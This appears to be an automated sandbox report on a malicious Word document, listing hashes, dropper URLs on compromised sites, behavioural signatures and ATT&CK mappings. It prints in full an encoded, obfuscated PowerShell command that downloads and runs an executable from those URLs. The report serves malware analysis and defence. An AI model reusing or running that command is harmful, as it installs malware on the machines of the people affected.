3dfac29cb19999e98c7c55034d7abd9cca65c3d4a7bc00c109bbdb1e57f2b2bd

General

Target

a01a47cc59429ff2dff8a741f6b89af0_JaffaCakes118.doc
Size

150KB
MD5

a01a47cc59429ff2dff8a741f6b89af0
SHA1

b405298c8de8f6aa889356b2201c47e8102738c3
SHA256

3dfac29cb19999e98c7c55034d7abd9cca65c3d4a7bc00c109bbdb1e57f2b2bd
SHA512

60229f24930435c56597683322134303efc685392b136298d6a0a7ca094880be00af3411a94a34165c9ff7203a6675fb4c7552e373e67dfa750d1ee53890ac5c
SSDEEP

1536:TJVnK90GM9xuXFEr4Zx50zkGcclJvahtq/VHXiNL0CMdfFB6OS:TfCMbu1Ty+crSOXiNBUfFB6OS

Score

10^/10

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

http://jubilantenterprise.com/wp-admin/Mj/

exe.dropper

http://brycebrumley.com/wp-admin/lj/

exe.dropper

http://aprendiendoganasdigital.com/wp-admin/r/

exe.dropper

http://mymorninglove.com/wp-admin/acv/

exe.dropper

http://shivam-aggarwal.com/cgi-bin/Zr/

exe.dropper

https://originalsalonqatar.com/wp-admin/lS0/

exe.dropper

http://aigtreyas.com/wp-content/p/

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3052	3616	POwersheLL.exe	84

Blocklisted process makes network request 3 IoCs

flow	pid	Process
23	3052	POwersheLL.exe
25	3052	POwersheLL.exe
38	3052	POwersheLL.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
4440	WINWORD.EXE
4440	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
3052	POwersheLL.exe
3052	POwersheLL.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	3052	POwersheLL.exe

Suspicious use of SetWindowsHookEx 7 IoCs

pid	Process
4440	WINWORD.EXE
4440	WINWORD.EXE
4440	WINWORD.EXE
4440	WINWORD.EXE
4440	WINWORD.EXE
4440	WINWORD.EXE
4440	WINWORD.EXE

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\a01a47cc59429ff2dff8a741f6b89af0_JaffaCakes118.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:4440

C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
POwersheLL -ENCOD JABWAGUAbwBzAG4AYQBlAD0AKAAoACcAUgBlACcAKwAnAHcAJwApACsAKAAnAGEAcQAnACsAJwBjAHcAJwApACkAOwAuACgAJwBuAGUAJwArACcAdwAnACsAJwAtAGkAdABlAG0AJwApACAAJABlAE4AdgA6AFUAUwBlAFIAUABSAG8ARgBpAGwARQBcAFIAZQAwAFEAZQB1AFkAXABBAFUASABqAFYAOQAzAFwAIAAtAGkAdABlAG0AdAB5AHAAZQAgAGQASQByAGUAQwB0AG8AUgB5ADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAYABjAGAAVQByAGAASQBUAFkAUABSAGAAbwB0AG8AQwBvAGwAIgAgAD0AIAAoACgAJwB0AGwAJwArACcAcwAxACcAKwAnADIALAAnACkAKwAoACcAIAB0ACcAKwAnAGwAcwAnACkAKwAoACcAMQAxACcAKwAnACwAJwApACsAKAAnACAAJwArACcAdABsACcAKQArACcAcwAnACkAOwAkAE4AawBrAGUAeQAzAHIAIAA9ACAAKAAoACcAVQB1ACcAKwAnAHAAJwApACsAKAAnADEAdQAnACsAJwAwACcAKQApADsAJABVAGQAcgA4AHMAaQAyAD0AKAAnAE8AcwAnACsAKAAnADgAbAB0ACcAKwAnAG4AXwAnACkAKQA7ACQASgAyADQAOQBiAHEAXwA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAoACgAJwBBACcAKwAoACcAZAByACcAKwAnAFIAJwApACsAKAAnAGUAMABxAGUAdQB5ACcAKwAnAEEAZAByAEEAdQBoAGoAdgA5ACcAKwAnADMAJwArACcAQQBkACcAKQArACcAcgAnACkALgAiAHIARQBgAHAATABgAEEAQwBlACIAKAAoAFsAYwBoAGEAcgBdADYANQArAFsAYwBoAGEAcgBdADEAMAAwACsAWwBjAGgAYQByAF0AMQAxADQAKQAsAFsAUwBUAHIAaQBOAEcAXQBbAGMAaABhAHIAXQA5ADIAKQApACsAJABOAGsAawBlAHkAMwByACsAKAAnAC4AJwArACgAJwBlACcAKwAnAHgAZQAnACkAKQA7ACQAUgBfAHEANABhADAAeQA9ACgAKAAnAFkAJwArACcAMABiACcAKQArACcAcgAnACsAKAAnAGEAJwArACcAdABjACcAKQApADsAJABYAGkAdQAzAGkAZgAwAD0ALgAoACcAbgAnACsAJwBlAHcALQBvACcAKwAnAGIAagBlAGMAdAAnACkAIABuAGUAdAAuAFcARQBCAGMATABpAEUATgB0ADsAJABZAHgANwBlAGsAMgBoAD0AKAAoACcAaAAnACsAJwB0AHQAJwArACcAcAA6AC8ALwBqACcAKQArACgAJwB1AGIAJwArACcAaQBsACcAKwAnAGEAbgAnACsAJwB0AGUAbgB0AGUAcgBwACcAKwAnAHIAaQBzAGUALgBjAG8AJwArACcAbQAnACsAJwAvAHcAcAAtAGEAZABtAGkAbgAnACsAJwAvACcAKQArACcATQAnACsAJwBqAC8AJwArACcAKgBoACcAKwAoACcAdAB0ACcAKwAnAHAAOgAvAC8AYgByAHkAYwBlACcAKwAnAGIAcgAnACsAJwB1AG0AJwApACsAJwBsACcAKwAnAGUAJwArACgAJwB5AC4AYwAnACsAJwBvAG0ALwB3AHAALQAnACsAJwBhACcAKQArACgAJwBkAG0AaQBuAC8AJwArACcAbABqAC8AJwApACsAKAAnACoAaAB0AHQAJwArACcAcAA6AC8AJwApACsAKAAnAC8AYQAnACsAJwBwACcAKQArACgAJwByAGUAJwArACcAbgBkAGkAZQBuACcAKQArACgAJwBkACcAKwAnAG8AZwBhACcAKQArACgAJwBuAGEAcwAnACsAJwBkAGkAZwAnACkAKwAoACcAaQB0ACcAKwAnAGEAbAAnACsAJwAuAGMAbwBtAC8AdwBwACcAKwAnAC0AJwApACsAKAAnAGEAZABtAGkAbgAvACcAKwAnAHIAJwApACsAKAAnAC8AJwArACcAKgBoAHQAJwApACsAKAAnAHQAcAA6AC8AJwArACcALwBtAHkAbQAnACkAKwAnAG8AcgAnACsAKAAnAG4AaQAnACsAJwBuAGcAbABvAHYAJwApACsAKAAnAGUAJwArACcALgBjACcAKQArACcAbwAnACsAKAAnAG0ALwB3ACcAKwAnAHAALQAnACsAJwBhAGQAbQBpAG4AJwApACsAKAAnAC8AYQBjAHYAJwArACcALwAqAGgAJwApACsAJwB0AHQAJwArACgAJwBwACcAKwAnADoALwAvAHMAJwArACcAaABpACcAKQArACcAdgBhACcAKwAoACcAbQAnACsAJwAtAGEAJwApACsAKAAnAGcAZwBhAHIAJwArACcAdwAnACkAKwAnAGEAJwArACgAJwBsACcAKwAnAC4AYwAnACkAKwAoACcAbwBtAC8AYwBnAGkALQAnACsAJwBiACcAKwAnAGkAbgAnACsAJwAvACcAKQArACcAWgAnACsAJwByAC8AJwArACcAKgAnACsAKAAnAGgAdAAnACsAJwB0ACcAKwAnAHAAcwA6AC8ALwBvAHIAaQBnACcAKQArACgAJwBpACcAKwAnAG4AYQAnACsAJwBsAHMAYQBsACcAKQArACgAJwBvAG4AJwArACcAcQBhAHQAYQAnACkAKwAnAHIALgAnACsAKAAnAGMAJwArACcAbwBtAC8AdwBwAC0AJwArACcAYQBkAG0AJwApACsAJwBpACcAKwAoACcAbgAvACcAKwAnAGwAUwAwACcAKwAnAC8AKgAnACkAKwAnAGgAdAAnACsAJwB0AHAAJwArACgAJwA6AC8ALwBhAGkAZwAnACsAJwB0AHIAJwArACcAZQB5ACcAKQArACgAJwBhAHMAJwArACcALgAnACkAKwAoACcAYwAnACsAJwBvAG0ALwAnACkAKwAoACcAdwBwAC0AYwBvAG4AJwArACcAdABlAG4AJwArACcAdAAnACsAJwAvAHAALwAnACkAKQAuACIAcwBgAFAATABpAFQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABXADUAdgBvADgAZQB4AD0AKAAnAFkAMAAnACsAKAAnAGIAcwB1ACcAKwAnADMAYwAnACkAKQA7AGYAbwByAGUAYQBjAGgAKAAkAFgAaQA4AGQANQB0AG8AIABpAG4AIAAkAFkAeAA3AGUAawAyAGgAKQB7AHQAcgB5AHsAJABYAGkAdQAzAGkAZgAwAC4AIgBkAE8AdwBuAGwAYABPAEEAYABEAEYAaQBsAGUAIgAoACQAWABpADgAZAA1AHQAbwAsACAAJABKADIANAA5AGIAcQBfACkAOwAkAFUAdgAyADIAZQBnAGwAPQAoACcATAB2ACcAKwAoACcAMAB0AGcAJwArACcAagBnACcAKQApADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0AC0ASQB0AGUAbQAnACkAIAAkAEoAMgA0ADkAYgBxAF8AKQAuACIAbABlAGAATgBnAHQAaAAiACAALQBnAGUAIAAyADAANwA3ADgAKQAgAHsALgAoACcASQBuAHYAbwBrACcAKwAnAGUALQBJAHQAJwArACcAZQBtACcAKQAoACQASgAyADQAOQBiAHEAXwApADsAJABDAHEAegAzAHYAZAB1AD0AKAAoACcARgA2ACcAKwAnAGIAJwArACcAOABmAG0AJwApACsAJwBoACcAKQA7AGIAcgBlAGEAawA7ACQARwB6AHAAMwBsAHoAegA9ACgAJwBUACcAKwAoACcAMABsAGYAZQBjACcAKwAnAHkAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEEAYgByAGwAbgBfAGkAPQAoACcARQBvACcAKwAnADgAJwArACgAJwBsAGoAJwArACcAOQBrACcAKQApAA==
1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3052

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\TCDD771.tmp\iso690.xsl

Filesize
263KB

MD5
ff0e07eff1333cdf9fc2523d323dd654

SHA1
77a1ae0dd8dbc3fee65dd6266f31e2a564d088a4

SHA256
3f925e0cc1542f09de1f99060899eafb0042bb9682507c907173c392115a44b5

SHA512
b4615f995fab87661c2dbe46625aa982215d7bde27cafae221dca76087fe76da4b4a381943436fcac1577cb3d260d0050b32b7b93e3eb07912494429f126bb3d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sbfqsenk.mep.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/3052-75-0x00007FFCC1790000-0x00007FFCC1985000-memory.dmp

Filesize
2.0MB

Download
memory/3052-93-0x00007FFCC1790000-0x00007FFCC1985000-memory.dmp

Filesize
2.0MB

Download
memory/3052-81-0x000001F83B7A0000-0x000001F83B7C2000-memory.dmp

Filesize
136KB

Download
memory/4440-10-0x00007FFCC1790000-0x00007FFCC1985000-memory.dmp

Filesize
2.0MB

Download
memory/4440-31-0x00007FFCC1790000-0x00007FFCC1985000-memory.dmp

Filesize
2.0MB

Download
memory/4440-5-0x00007FFC81810000-0x00007FFC81820000-memory.dmp

Filesize
64KB

Download
memory/4440-9-0x00007FFCC1790000-0x00007FFCC1985000-memory.dmp

Filesize
2.0MB

Download
memory/4440-0-0x00007FFC81810000-0x00007FFC81820000-memory.dmp

Filesize
64KB

Download
memory/4440-12-0x00007FFCC1790000-0x00007FFCC1985000-memory.dmp

Filesize
2.0MB

Download
memory/4440-11-0x00007FFCC1790000-0x00007FFCC1985000-memory.dmp

Filesize
2.0MB

Download
memory/4440-15-0x00007FFCC1790000-0x00007FFCC1985000-memory.dmp

Filesize
2.0MB

Download
memory/4440-16-0x00007FFCC1790000-0x00007FFCC1985000-memory.dmp

Filesize
2.0MB

Download
memory/4440-14-0x00007FFCC1790000-0x00007FFCC1985000-memory.dmp

Filesize
2.0MB

Download
memory/4440-17-0x00007FFC7F7B0000-0x00007FFC7F7C0000-memory.dmp

Filesize
64KB

Download
memory/4440-18-0x00007FFCC1790000-0x00007FFCC1985000-memory.dmp

Filesize
2.0MB

Download
memory/4440-19-0x00007FFCC1790000-0x00007FFCC1985000-memory.dmp

Filesize
2.0MB

Download
memory/4440-13-0x00007FFC7F7B0000-0x00007FFC7F7C0000-memory.dmp

Filesize
64KB

Download
memory/4440-7-0x00007FFCC1790000-0x00007FFCC1985000-memory.dmp

Filesize
2.0MB

Download
memory/4440-8-0x00007FFCC1790000-0x00007FFCC1985000-memory.dmp

Filesize
2.0MB

Download
memory/4440-35-0x00007FFCC1790000-0x00007FFCC1985000-memory.dmp

Filesize
2.0MB

Download
memory/4440-6-0x00007FFCC1790000-0x00007FFCC1985000-memory.dmp

Filesize
2.0MB

Download
memory/4440-4-0x00007FFC81810000-0x00007FFC81820000-memory.dmp

Filesize
64KB

Download
memory/4440-1-0x00007FFC81810000-0x00007FFC81820000-memory.dmp

Filesize
64KB

Download
memory/4440-86-0x00007FFCC1790000-0x00007FFCC1985000-memory.dmp

Filesize
2.0MB

Download
memory/4440-87-0x00007FFCC1790000-0x00007FFCC1985000-memory.dmp

Filesize
2.0MB

Download
memory/4440-2-0x00007FFC81810000-0x00007FFC81820000-memory.dmp

Filesize
64KB

Download
memory/4440-94-0x00007FFCC1790000-0x00007FFCC1985000-memory.dmp

Filesize
2.0MB

Download
memory/4440-100-0x00007FFCC1790000-0x00007FFCC1985000-memory.dmp

Filesize
2.0MB

Download
memory/4440-3-0x00007FFCC182D000-0x00007FFCC182E000-memory.dmp

Filesize
4KB

Download
memory/4440-598-0x00007FFC81810000-0x00007FFC81820000-memory.dmp

Filesize
64KB

Download
memory/4440-600-0x00007FFC81810000-0x00007FFC81820000-memory.dmp

Filesize
64KB

Download
memory/4440-601-0x00007FFC81810000-0x00007FFC81820000-memory.dmp

Filesize
64KB

Download
memory/4440-599-0x00007FFC81810000-0x00007FFC81820000-memory.dmp

Filesize
64KB

Download
memory/4440-602-0x00007FFCC1790000-0x00007FFCC1985000-memory.dmp

Filesize
2.0MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads